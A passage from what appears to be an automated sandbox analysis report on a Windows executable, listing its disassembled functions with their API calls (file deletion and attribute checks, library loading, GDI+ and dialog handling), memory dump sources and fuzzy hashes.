                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: dcf82bea9641cf370e89c8dfe0a8509a56f8cb8e369effe5fb16c2f9fc1b4bc2
                                                            • Instruction ID: 186f3ac8420b0b2e0aea1bd214af1baad83503851ba774b602a5f2f0548cd11d
                                                            • Opcode Fuzzy Hash: dcf82bea9641cf370e89c8dfe0a8509a56f8cb8e369effe5fb16c2f9fc1b4bc2
                                                            • Instruction Fuzzy Hash: F6F06532240249BBDF015F61DC45FDE3BADAF18385F448051B945D5164DB71DBD8DB50
                                                            Function 001EA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,001E977F,?,?,001E95CF,?,?,?,?,?,00212641,000000FF), ref: 001EA1F1
                                                              • Part of subcall function 001EBB03: _wcslen.LIBCMT ref: 001EBB27
                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,001E977F,?,?,001E95CF,?,?,?,?,?,00212641), ref: 001EA21F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            • Opcode ID: a5b2c83f6702ab23a2448410f02af0dfcebc8ffc906caa217b32a477a428dd63
                                                            • Instruction ID: c83a2f462a22c58cfe75d49af5bb383cab985099df79896635a8ab13bb0fbcb8
                                                            • Opcode Fuzzy Hash: a5b2c83f6702ab23a2448410f02af0dfcebc8ffc906caa217b32a477a428dd63
                                                            • Instruction Fuzzy Hash: 20E092311402496BDB019F61EC45FEE379DBF1C781F484021BA44E2060EB61DE84DA60
                                                            Function 001FAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00212641,000000FF), ref: 001FACB0
                                                            • CoUninitialize.COMBASE(?,?,?,?,00212641,000000FF), ref: 001FACB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            • String ID:
                                                            • API String ID: 3856339756-0
                                                            • Opcode ID: c63ab24ead996029d9894b39caa34b1f821ada57ef1c0d2986393b7a2771c199
                                                            • Instruction ID: 9296b70c0daeb3ff6f3597de27490eaa9f1e46dc7746e504b7e0bf0943db0dcf
                                                            • Opcode Fuzzy Hash: c63ab24ead996029d9894b39caa34b1f821ada57ef1c0d2986393b7a2771c199
                                                            • Instruction Fuzzy Hash: 06E06572604650EFC710EB58EC06B45FBEDFB99B20F104265F416D37A0CB74A841CA90
                                                            Function 001EA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,001EA23A,?,001E755C,?,?,?,?), ref: 001EA254
                                                              • Part of subcall function 001EBB03: _wcslen.LIBCMT ref: 001EBB27
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,001EA23A,?,001E755C,?,?,?,?), ref: 001EA280
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 28f8c6e1f49a166e419814c24ef92491f6eda6bd4021d904f294adc3b1123c78
                                                            • Instruction ID: 7bf0c8d8d9f6206b2fc02a0c74d7b0b1fefb18ad927b3a241bc35df20ff1d03a
                                                            • Opcode Fuzzy Hash: 28f8c6e1f49a166e419814c24ef92491f6eda6bd4021d904f294adc3b1123c78
                                                            • Instruction Fuzzy Hash: CDE092325001689BCF10EB64DC09BDDB799AB2C3E1F044261FE44E3190DB70DE44CAA0
                                                            Function 001FDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 001FDEEC
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 001FDF03
                                                              • Part of subcall function 001FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001FB579
                                                              • Part of subcall function 001FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FB58A
                                                              • Part of subcall function 001FB568: IsDialogMessageW.USER32(00010412,?), ref: 001FB59E
                                                              • Part of subcall function 001FB568: TranslateMessage.USER32(?), ref: 001FB5AC
                                                              • Part of subcall function 001FB568: DispatchMessageW.USER32(?), ref: 001FB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            • String ID:
                                                            • API String ID: 2718869927-0
                                                            • Opcode ID: 94b07dfdcae93c33572f5a61c834bfe2dea97226a18018f29b3f5b7e67e1d1aa
                                                            • Instruction ID: e7c847d7b1025bc78da8111ed7aa0208493009a5927fe89b6174b76a5949600d
                                                            • Opcode Fuzzy Hash: 94b07dfdcae93c33572f5a61c834bfe2dea97226a18018f29b3f5b7e67e1d1aa
                                                            • Instruction Fuzzy Hash: D5E09BB540438837DF11B761EC0AFEE37EC5B25785F440451B304DA0B2DB78D6118661
                                                            Function 001F081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001F0836
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001EF2D8,Crypt32.dll,00000000,001EF35C,?,?,001EF33E,?,?,?), ref: 001F0858
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 02ac4f4317a4df0226ec733f0af67cd98e7c7207ce534cc984022c92cd6beb83
                                                            • Instruction ID: 1e233cc83f7faae245b01ba6f622da1556bf84111be115fdd1ee90c071e864c2
                                                            • Opcode Fuzzy Hash: 02ac4f4317a4df0226ec733f0af67cd98e7c7207ce534cc984022c92cd6beb83
                                                            • Instruction Fuzzy Hash: 25E09A728002286ACB01ABA0AC08FEA7BADEF1C3D1F040065B608E2004DB74DA808AA0
                                                            Function 001FA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001FA3DA
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 001FA3E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: 5c2ac790db437e485ab5cb61ba2972a035bd350d198abe511eed257369613ee1
                                                            • Instruction ID: 57405602d98779533ea8664722d4397fdd545b610fd767939486fe4cc6a7f625
                                                            • Opcode Fuzzy Hash: 5c2ac790db437e485ab5cb61ba2972a035bd350d198abe511eed257369613ee1
                                                            • Instruction Fuzzy Hash: 41E0EDB190021CEBCB10DF55C5416A9BBE8EF14360F10805AA94A93251E374AE44DB91
                                                            Function 00202B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00202BAA
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00202BB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            • Opcode ID: d9b0e12bb6c120c6b5a012f72a754b303227c7cdc5aa1c867303298ae6c15b6b
                                                            • Instruction ID: 68a4d4a57fd60daf1874870296a00a6c2786a8be44108ab4c59e0659a2dfa148
                                                            • Opcode Fuzzy Hash: d9b0e12bb6c120c6b5a012f72a754b303227c7cdc5aa1c867303298ae6c15b6b
                                                            • Instruction Fuzzy Hash: 57D02335174301D4DF146E743C0F7583359AD52B7CBE05287F420C54C3DE91407C6411
                                                            Function 001E12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            • Opcode ID: ef5fe9ec84ea7165dbefbba709ab6d0c6b5b25b72b004f5348a3a095bbaaec4a
                                                            • Instruction ID: 48d919ca01cd68e7e4e49d784f5f6b418306a3a8a3c806378a971e3559d9f0e8
                                                            • Opcode Fuzzy Hash: ef5fe9ec84ea7165dbefbba709ab6d0c6b5b25b72b004f5348a3a095bbaaec4a
                                                            • Instruction Fuzzy Hash: 04C0123A05C240BFCB018BB4EC0DC2BBBA8ABA6712F04C908B0ADC0060C238C110DB11
                                                            Function 001E1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: b936cf1cbb3da39388e9fb725195e57ba5a6eefd3ee191db93b3a4efdb17921b
                                                            • Instruction ID: da19523a917fd1d6edcc97a7af6a231d0a9c460d2f926987fb69777a4257d097
                                                            • Opcode Fuzzy Hash: b936cf1cbb3da39388e9fb725195e57ba5a6eefd3ee191db93b3a4efdb17921b
                                                            • Instruction Fuzzy Hash: 2AC1B730A00A94BFDF19DF65C888BAD7BA5AF15310F1841B9EC45DB396DB309D44CB61
                                                            Function 001E3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 0a2c353eb202323674bc3dee5c24d4ccd1ca78c77e3eee69a61dbf07a9c1d62c
                                                            • Instruction ID: 90d636933f076b4bfd734e79dfea1fa6136aff64aab4a8d5e90e7b61c995a83f
                                                            • Opcode Fuzzy Hash: 0a2c353eb202323674bc3dee5c24d4ccd1ca78c77e3eee69a61dbf07a9c1d62c
                                                            • Instruction Fuzzy Hash: E071B271500F849EDB25DB71C8599EBB7E9AF24300F44096EF6BB87241DB326A84CF11
                                                            Function 001E8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E8289
                                                              • Part of subcall function 001E13DC: __EH_prolog.LIBCMT ref: 001E13E1
                                                              • Part of subcall function 001EA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001EA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            • Opcode ID: 03682d877400f58800b7f3755de47e1de35d63dea153403ee2ed6b21f42ec215
                                                            • Instruction ID: 58cd47ebf88ae4f8e8bd31bed4da27b1ebf686258b06ff36cf0d8d6b62307adb
                                                            • Opcode Fuzzy Hash: 03682d877400f58800b7f3755de47e1de35d63dea153403ee2ed6b21f42ec215
                                                            • Instruction Fuzzy Hash: 1D41CB71944A989ADB24DBA1CC55BEDB7B8BF10304F4404EAE18E57093EB705FC5CB50
                                                            Function 001E13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E13E1
                                                              • Part of subcall function 001E5E37: __EH_prolog.LIBCMT ref: 001E5E3C
                                                              • Part of subcall function 001ECE40: __EH_prolog.LIBCMT ref: 001ECE45
                                                              • Part of subcall function 001EB505: __EH_prolog.LIBCMT ref: 001EB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 60d2d5a441713b1ee3c7b702746890e703c0583edfc6b2c39f7ff1dadd527b70
                                                            • Instruction ID: 0e87a1f40243bb04f039b5f25b4dffe3c02a9d4942de4912232fc00193838539
                                                            • Opcode Fuzzy Hash: 60d2d5a441713b1ee3c7b702746890e703c0583edfc6b2c39f7ff1dadd527b70
                                                            • Instruction Fuzzy Hash: 90413EB0905B409ED724DF7A8885AE7FBE5BF29300F50492ED5FE83282C7716654CB10
                                                            Function 001E13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E13E1
                                                              • Part of subcall function 001E5E37: __EH_prolog.LIBCMT ref: 001E5E3C
                                                              • Part of subcall function 001ECE40: __EH_prolog.LIBCMT ref: 001ECE45
                                                              • Part of subcall function 001EB505: __EH_prolog.LIBCMT ref: 001EB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 0c8d7f686d4d28c09da0b6c8be82d07ff182690c65a78773bdbe61d9ab04eeaf
                                                            • Instruction ID: 3b6d97097a10d254d8f4f6e721d46fd2ce0347ee216d79623213e6d1f5cebfb2
                                                            • Opcode Fuzzy Hash: 0c8d7f686d4d28c09da0b6c8be82d07ff182690c65a78773bdbe61d9ab04eeaf
                                                            • Instruction Fuzzy Hash: 75413DB0905B809EE724DF7A8885AE7FBE5BF29300F50492ED5FE83282C7716654CB10
                                                            Function 001F359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 801158a3353108aa9ecc8502c977a8c52f9c255a6a82771bdf7b38a7566a33ad
                                                            • Instruction ID: 75252957f41f23dc3747fb136a0bc626f4bd4575fdc141ad3b952b663e39f313
                                                            • Opcode Fuzzy Hash: 801158a3353108aa9ecc8502c977a8c52f9c255a6a82771bdf7b38a7566a33ad
                                                            • Instruction Fuzzy Hash: 1B21D8B5E40219ABDB14DF74CC45A7B76A8FF24754F14023AE616E7781D7B09A00C6E8
                                                            Function 001FB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001FB098
                                                              • Part of subcall function 001E13DC: __EH_prolog.LIBCMT ref: 001E13E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: f1ecaecf0ec8bc12e2113bab91bcb79658e09a86e487706e1b0088ec0e5c1bc4
                                                            • Instruction ID: 48f378524281c583a71230ea42d1b6289b5e081468661764e62a8de2fe5e13ce
                                                            • Opcode Fuzzy Hash: f1ecaecf0ec8bc12e2113bab91bcb79658e09a86e487706e1b0088ec0e5c1bc4
                                                            • Instruction Fuzzy Hash: 9131AD75C18249EECF15DF65D891AFEBBB4AF19300F14449EE409B3282D735AE04CB61
                                                            Function 001E9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
